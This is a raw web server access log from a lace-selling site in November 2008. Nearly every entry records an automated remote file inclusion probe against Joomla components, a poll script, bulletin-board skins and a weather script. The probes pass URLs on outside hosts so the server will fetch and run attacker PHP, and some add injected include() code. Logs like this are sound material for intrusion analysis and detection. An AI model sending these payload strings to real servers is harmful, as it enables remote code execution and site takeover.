98.129.21.210 - - [22/Nov/2008:04:58:06 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.handmadelaces.com"
63.247.129.200 - - [22/Nov/2008:04:58:07 -0800] "GET /logs/access_081016.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.handmadelaces.com"
203.10.110.244 - - [22/Nov/2008:04:58:10 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.handmadelaces.com"
203.10.110.244 - - [22/Nov/2008:04:58:25 -0800] "GET /logs/access_081016.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:04:58:30 -0800] "GET /logs/access_081016.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:04:58:38 -0800] "GET /logs/access_081016.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:04:58:55 -0800] "GET /logs/access_081016.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
63.247.90.202 - - [22/Nov/2008:04:58:57 -0800] "GET /logs/access_081016.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.handmadelaces.com"
63.247.90.202 - - [22/Nov/2008:04:58:57 -0800] "GET /logs/access_081016.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.handmadelaces.com"
63.247.90.202 - - [22/Nov/2008:04:58:57 -0800] "GET /logs/access_081016.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.handmadelaces.com"
63.247.129.200 - - [22/Nov/2008:04:59:09 -0800] "GET /logs/access_081016.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.handmadelaces.com"
203.10.110.244 - - [22/Nov/2008:04:59:13 -0800] "GET /logs/access_081016.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.handmadelaces.com"
63.247.90.202 - - [22/Nov/2008:04:59:13 -0800] "GET /logs/access_081016.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.handmadelaces.com"
63.247.90.202 - - [22/Nov/2008:04:59:18 -0800] "GET /logs/access_081016.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.handmadelaces.com"
63.247.90.202 - - [22/Nov/2008:04:59:19 -0800] "GET /logs/access_081016.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:04:59:19 -0800] "GET /logs//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:04:59:19 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:04:59:20 -0800] "GET /logs//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:04:59:20 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:04:59:22 -0800] "GET /logs/access_081016.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:04:59:46 -0800] "GET /logs/access_081016.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:04:59:48 -0800] "GET /logs/access_081016.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:05:00:01 -0800] "GET /logs//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:05:00:01 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:05:00:04 -0800] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://billing.magnoliasouth.com//include/scripts/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:05:00:04 -0800] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://billing.magnoliasouth.com//include/scripts/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:05:00:06 -0800] "GET /logs/access_081016.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:05:00:18 -0800] "GET /logs//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:05:00:18 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:05:00:31 -0800] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://billing.magnoliasouth.com//include/scripts/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:05:00:32 -0800] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://billing.magnoliasouth.com//include/scripts/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
207.44.238.31 - - [22/Nov/2008:05:00:33 -0800] "GET /logs/access_081017.log/?sourcedir=http://musicsalang.com/technote7/data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.handmadelaces.com"
207.44.238.31 - - [22/Nov/2008:05:00:33 -0800] "GET /?sourcedir=http://musicsalang.com/technote7/data/id.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.76" "www.handmadelaces.com"
207.44.238.31 - - [22/Nov/2008:05:00:34 -0800] "GET /logs/?sourcedir=http://musicsalang.com/technote7/data/id.txt??? HTTP/1.1" 200 2368 "-" "libwww-perl/5.76" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:05:00:35 -0800] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://billing.magnoliasouth.com//include/scripts/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:05:00:35 -0800] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://billing.magnoliasouth.com//include/scripts/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:05:00:50 -0800] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://billing.magnoliasouth.com//include/scripts/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:05:00:50 -0800] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://billing.magnoliasouth.com//include/scripts/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:05:00:50 -0800] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://billing.magnoliasouth.com//include/scripts/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
219.117.252.226 - - [22/Nov/2008:05:01:33 -0800] "GET /poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://dwcable.co.kr/technote/board/.or/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.handmadelaces.com"
194.177.196.2 - - [22/Nov/2008:05:01:35 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:05:01:37 -0800] "GET /logs//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:05:01:37 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
194.177.196.2 - - [22/Nov/2008:05:01:37 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:05:01:44 -0800] "GET /logs//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:05:01:44 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
194.177.196.2 - - [22/Nov/2008:05:01:49 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.handmadelaces.com"
194.177.196.2 - - [22/Nov/2008:05:02:09 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.handmadelaces.com"
207.44.238.31 - - [22/Nov/2008:05:02:23 -0800] "GET /logs/access_081019.log/?sourcedir=http://musicsalang.com/technote7/data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.handmadelaces.com"
194.177.196.2 - - [22/Nov/2008:05:02:35 -0800] "GET /logs/access_081017.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.handmadelaces.com"
194.177.196.2 - - [22/Nov/2008:05:02:36 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.handmadelaces.com"
194.177.196.2 - - [22/Nov/2008:05:02:39 -0800] "GET /logs/access_081017.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.handmadelaces.com"
194.177.196.2 - - [22/Nov/2008:05:02:39 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.handmadelaces.com"
211.115.110.161 - - [22/Nov/2008:05:02:46 -0800] "GET /poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://dwcable.co.kr/technote/board/.or/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.handmadelaces.com"
194.177.196.2 - - [22/Nov/2008:05:03:09 -0800] "GET /logs/access_081017.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.handmadelaces.com"
86.109.98.224 - - [22/Nov/2008:05:03:12 -0800] "GET /logs/access_081023.log//bbs//skin/zero_vote/error.php?dir=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
86.109.98.224 - - [22/Nov/2008:05:03:13 -0800] "GET /bbs//skin/zero_vote/error.php?dir=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
86.109.98.224 - - [22/Nov/2008:05:03:13 -0800] "GET /logs//bbs//skin/zero_vote/error.php?dir=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
194.177.196.2 - - [22/Nov/2008:05:03:14 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.handmadelaces.com"
194.177.196.2 - - [22/Nov/2008:05:03:24 -0800] "GET /logs/access_081017.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.handmadelaces.com"
194.177.196.2 - - [22/Nov/2008:05:03:24 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.handmadelaces.com"
219.117.252.226 - - [22/Nov/2008:05:03:31 -0800] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://dwcable.co.kr/technote/board/.or/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.handmadelaces.com"
219.117.252.226 - - [22/Nov/2008:05:03:31 -0800] "GET /poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://dwcable.co.kr/technote/board/.or/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.handmadelaces.com"
219.117.252.226 - - [22/Nov/2008:05:03:31 -0800] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://dwcable.co.kr/technote/board/.or/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.handmadelaces.com"
219.117.252.226 - - [22/Nov/2008:05:03:31 -0800] "GET /poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://dwcable.co.kr/technote/board/.or/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.handmadelaces.com"
70.38.12.204 - - [22/Nov/2008:05:04:09 -0800] "GET /logs/access_081021.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
70.38.12.204 - - [22/Nov/2008:05:04:20 -0800] "GET /logs/access_081018.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
70.38.12.204 - - [22/Nov/2008:05:04:21 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:05:04:21 -0800] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://billing.magnoliasouth.com//include/scripts/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
70.38.12.204 - - [22/Nov/2008:05:04:21 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:05:04:32 -0800] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://billing.magnoliasouth.com//include/scripts/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:05:04:35 -0800] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://billing.magnoliasouth.com//include/scripts/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
211.255.32.189 - - [22/Nov/2008:05:04:42 -0800] "GET /logs/access_081021.log/?DOCUMENT_ROOT=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.handmadelaces.com"
211.255.32.189 - - [22/Nov/2008:05:04:43 -0800] "GET /?DOCUMENT_ROOT=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 200 779 "-" "libwww-perl/5.65" "www.handmadelaces.com"
211.255.32.189 - - [22/Nov/2008:05:04:43 -0800] "GET /logs/?DOCUMENT_ROOT=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 200 2368 "-" "libwww-perl/5.65" "www.handmadelaces.com"
203.10.110.244 - - [22/Nov/2008:05:05:22 -0800] "GET /logs//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.handmadelaces.com"
203.10.110.244 - - [22/Nov/2008:05:05:22 -0800] "GET /logs//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.handmadelaces.com"
203.10.110.244 - - [22/Nov/2008:05:05:23 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.handmadelaces.com"
203.10.110.244 - - [22/Nov/2008:05:05:23 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.handmadelaces.com"
86.109.98.224 - - [22/Nov/2008:05:05:39 -0800] "GET /logs/access_081023.log//bbs//skin/zero_vote/ask_password.php?dir=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
86.109.98.224 - - [22/Nov/2008:05:05:40 -0800] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
86.109.98.224 - - [22/Nov/2008:05:05:40 -0800] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
